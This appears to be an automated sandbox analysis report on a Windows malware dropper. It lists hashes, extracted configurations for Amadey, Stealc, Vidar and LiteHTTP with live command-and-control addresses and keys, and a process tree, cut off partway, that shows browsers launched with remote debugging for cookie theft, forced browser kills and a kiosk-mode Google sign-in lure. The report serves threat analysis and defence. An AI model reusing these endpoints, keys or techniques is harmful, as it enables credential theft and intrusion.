Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 20:03

General

  • Target

    a15e4db96250c2c494fa718b546e2efc974a366f5f40c9922d3458d891e9d452.exe

  • Size

    3.0MB

  • MD5

    81a426da814986b1b9ed5d5ec33764b9

  • SHA1

    a3a0cff2e9d4678ae0a2b94e13b3ac721e1c6c17

  • SHA256

    a15e4db96250c2c494fa718b546e2efc974a366f5f40c9922d3458d891e9d452

  • SHA512

    f0def9cd228107006617f68966e7c2fbd8dcbd82faa8adec540d69d74e9f30d5d6987a8df771436508163dff5667377cc88604842bebc3ae5da720ca438be7a9

  • SSDEEP

    49152:KzfKZsAGgwsEY0gkYChb/XDmhjzL70ckKzmisHWt69mPJJhdQt:Kb+sAVwsEY0gkYChbPDm1n0TKzmisa7m

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Downloads MZ/PE file 25 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 56 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a15e4db96250c2c494fa718b546e2efc974a366f5f40c9922d3458d891e9d452.exe
    "C:\Users\Admin\AppData\Local\Temp\a15e4db96250c2c494fa718b546e2efc974a366f5f40c9922d3458d891e9d452.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Downloads MZ/PE file
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1576
    • C:\Users\Admin\AppData\Local\Temp\COAR0YA43BYPYHU74QDVBMCS.exe
      "C:\Users\Admin\AppData\Local\Temp\COAR0YA43BYPYHU74QDVBMCS.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4332
        • C:\Users\Admin\AppData\Local\Temp\10106380101\e35f5e2f67.exe
          "C:\Users\Admin\AppData\Local\Temp\10106380101\e35f5e2f67.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            5⤵
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            PID:5028
        • C:\Users\Admin\AppData\Local\Temp\10106390101\3b3f13d12c.exe
          "C:\Users\Admin\AppData\Local\Temp\10106390101\3b3f13d12c.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2088
          • C:\Users\Admin\AppData\Local\Temp\10106390101\3b3f13d12c.exe
            "C:\Users\Admin\AppData\Local\Temp\10106390101\3b3f13d12c.exe"
            5⤵
            • Executes dropped EXE
            PID:4788
          • C:\Users\Admin\AppData\Local\Temp\10106390101\3b3f13d12c.exe
            "C:\Users\Admin\AppData\Local\Temp\10106390101\3b3f13d12c.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3748
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 820
            5⤵
            • Program crash
            PID:532
        • C:\Users\Admin\AppData\Local\Temp\10106400101\254fe104e1.exe
          "C:\Users\Admin\AppData\Local\Temp\10106400101\254fe104e1.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            5⤵
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            PID:3180
        • C:\Users\Admin\AppData\Local\Temp\10106410101\74f00d4ba6.exe
          "C:\Users\Admin\AppData\Local\Temp\10106410101\74f00d4ba6.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2528
        • C:\Users\Admin\AppData\Local\Temp\10106420101\17271eb936.exe
          "C:\Users\Admin\AppData\Local\Temp\10106420101\17271eb936.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:880
          • C:\Users\Admin\AppData\Local\Temp\CYINYYAKYIYBKEXJDRKU.exe
            "C:\Users\Admin\AppData\Local\Temp\CYINYYAKYIYBKEXJDRKU.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:5252
        • C:\Users\Admin\AppData\Local\Temp\10106430101\7807784176.exe
          "C:\Users\Admin\AppData\Local\Temp\10106430101\7807784176.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:336
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:4480
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe7f5ecc40,0x7ffe7f5ecc4c,0x7ffe7f5ecc58
              6⤵
                PID:4068
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1964 /prefetch:2
                6⤵
                  PID:4632
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1860,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2084 /prefetch:3
                  6⤵
                    PID:2612
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2452 /prefetch:8
                    6⤵
                      PID:3196
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4356
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3272 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:2020
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4180,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4512 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:5220
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4256,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3644 /prefetch:8
                      6⤵
                        PID:5484
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3640,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4864 /prefetch:8
                        6⤵
                          PID:5524
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4812,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:8
                          6⤵
                            PID:5928
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4272 /prefetch:8
                            6⤵
                              PID:6012
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4840 /prefetch:8
                              6⤵
                                PID:4920
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:8
                                6⤵
                                  PID:4616
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5056,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4888 /prefetch:8
                                  6⤵
                                    PID:1668
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5100,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5116 /prefetch:8
                                    6⤵
                                      PID:5696
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5144,i,7323123150223260478,4178970352357681545,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:2
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:5372
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                    5⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5424
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe7bf646f8,0x7ffe7bf64708,0x7ffe7bf64718
                                      6⤵
                                      • Checks processor information in registry
                                      • Enumerates system info in registry
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5828
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
                                      6⤵
                                        PID:1156
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
                                        6⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:5004
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                                        6⤵
                                          PID:3380
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:5440
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:5736
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:6320
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:6328
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7016983774747455757,7273747329072813056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
                                          6⤵
                                            PID:6936
                                      • C:\Users\Admin\AppData\Local\Temp\10106440101\2f6b756d17.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10106440101\2f6b756d17.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:5808
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM firefox.exe /T
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5880
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM chrome.exe /T
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5920
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM msedge.exe /T
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5868
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM opera.exe /T
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5800
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM brave.exe /T
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5760
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                          5⤵
                                            PID:5644
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                              6⤵
                                              • Checks processor information in registry
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              • Suspicious use of SetWindowsHookEx
                                              PID:5632
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a26dffa8-7080-458d-8cee-4e5640233507} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" gpu
                                                7⤵
                                                  PID:4204
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa2f6c5c-a19b-4aa2-8a15-1a60075421b0} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" socket
                                                  7⤵
                                                    PID:5356
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3244 -childID 1 -isForBrowser -prefsHandle 3232 -prefMapHandle 3284 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8562cdc7-92a5-477d-b954-994d26eb21c6} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
                                                    7⤵
                                                      PID:5528
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
